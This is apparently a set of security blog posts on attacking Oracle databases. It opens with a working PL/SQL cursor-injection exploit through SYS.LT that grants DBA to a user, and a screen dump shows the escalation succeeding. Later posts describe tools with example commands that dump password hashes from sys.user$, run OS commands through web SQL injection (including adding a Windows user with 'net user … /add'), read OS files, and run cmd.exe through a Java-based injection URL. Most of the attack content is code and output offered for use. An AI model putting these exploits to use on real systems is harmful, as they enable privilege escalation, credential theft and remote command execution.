This is slightly modified version of: http://milw0rm.com/exploits/7677
This is based on cursor injection and here you do not need create function privileges:
text file
——
DECLARE
D NUMBER;
BEGIN
D := DBMS_SQL.OPEN_CURSOR;
DBMS_SQL.PARSE(D,’declare pragma autonomous_transaction; begin execute immediate ”grant dba to scott”;commit;end;’,0);
SYS.LT.CREATEWORKSPACE(’a”and dbms_sql.execute(’||D||’)=1–’);
SYS.LT.COMPRESSWORKSPACETREE(’a”and dbms_sql.execute(’||D||’)=1–’);
end;
#———–screen dump—————————————————#
SQL> select * from user_role_privs;
USERNAME GRANTED_ROLE ADM DEF OS_
—————————— —————————— — — —
SCOTT CONNECT NO YES NO
SCOTT EXECUTE_CATALOG_ROLE NO YES NO
SCOTT RESOURCE NO YES NO
SQL> DECLARE
2 D NUMBER;
3 BEGIN
4 D := DBMS_SQL.OPEN_CURSOR;
5 DBMS_SQL.PARSE(D,’declare pragma autonomous_transaction; begin execute immediate ”grant dba to scott”;commit;end;’,0);
6 SYS.LT.CREATEWORKSPACE(’a”and dbms_sql.execute(’||D||’)=1–’);
7 SYS.LT.COMPRESSWORKSPACETREE(’a”and dbms_sql.execute(’||D||’)=1–’);
8 end;
9
10
11 /
DECLARE
*
ERROR at line 1:
ORA-01403: no data found
ORA-06512: at “SYS.LT”, line 6118
ORA-06512: at “SYS.LT”, line 6087
ORA-06512: at line 7
SQL> select * from user_role_privs;
USERNAME GRANTED_ROLE ADM DEF OS_
—————————— —————————— — — —
SCOTT CONNECT NO YES NO
SCOTT DBA NO YES NO
SCOTT EXECUTE_CATALOG_ROLE NO YES NO
SCOTT RESOURCE NO YES NO
—
I will be giving a talk at Defcon this year. The Talk is about attacking Oracle databases from web applications. A small write-up on the talk can be found here.
Remember the SQL Injection worm which targeted the applications with MS-SQL server. I will demonstrate a proof-of-concept of how this can be achieved against Oracle.
See you in Vegas…
A new version of bsqlbf is now available. The following are the new additions:
-------------------
-type: Type of injection:
3: Type 3 is extracting data with DBA privileges
(e.g. Oracle password hashes from sys.user$)
4: Type 4 is O.S code execution(default: ping 127.0.0.1)
5: Type 5 is Reading O.S files(default: c:\boot.ini)
--------------------
Type 4 (O.S code execution) supports the following sub types:
-stype: How you want to execute command:
0: SType 0 (default) is based on java,
universal but won't work against XE
1: SType 1 against oracle 9 with plsql_native_make_utility
2: SType 2 against oracle 10 with dbms_scheduler
———————-
Examples:
./bsqlbf-v2.3.pl -url http://192.168.1.1/injection.jsp/1.jsp?p=1 -type 3 -match “true” -sql “select password from sys.user$ where rownum=1″
./bsqlbf-v2.3.pl -url http://192.168.1.1/injection.jsp/1.jsp?p=1 -type 4 -match “true” -cmd “ping notsosecure.com”
./bsqlbf-v2.3.pl -url http://192.168.1.1/injecti.jsp/1.jsp?p=1 -type 5 -match “true” -file “C:\boot.ini”
———————
Download from Project Homepage: http://code.google.com/p/bsqlbf-v2/
———————
All these additions are based on dbms_export_extension exploit. This will work against the following oracle versions:
Oracle 8.1.7.4, 9.2.0.1 - 9.2.0.7, 10.1.0.2 - 10.1.0.4, 10.2.0.1-10.2.0.2, XE
————————
Enjoy…
I wrote a small perl script to automate this process. The script ‘ora_cmd_exec.pl’ exploits web based SQL Injections and execute O.S commands on the Oracle host.
./ora_cmd_exec.pl
———————————————————————–
Oracle command execution via web apps
sid-at-NotSoSecure // www.notsosecure.com
suported versions <=10.2.0.2, all platforms
------------------------------------------------------------------------
Usage:
ora_cmd_exec.pl
EXAMPLE: ./ora_cmd_exec.pl “http://192.168.172.129:81/ora3.php?name=s’ ” “net user notsosecure n0tsos3cur3 /add”
EXAMPLE: ./ora_cmd_exec.pl “http://192.168.172.129:81/ora3.php?id=100 ” “net user notsosecure n0tsos3cur3 /add”
————————————————————————
Download Here
I finally managed to get this working. Just followed the instructions on the website:
http://sec.hebei.com.cn/bbs_topic.do?forumID=18&postID=4275&replyID=0&skin=1
&saveSkin=true&pages=0&replyNum=
These are the 5 steps:
1. create java class
2. give execute permissions on java
3. create function to run cmd
4. grant execute on function to public
5. run the command.
I have copied all the long SQL commands in a text file to make things easier.
An example of command execution is:
http://192.168.172.129:81/ora2.php?name=1%20and%201=
(select%20sys.LinxRunCMD(%27cmd.exe%20/c%20whoami%27)%20from%20dual)
The website also talks about some cool hacks to get the output of the command through OOB channels.
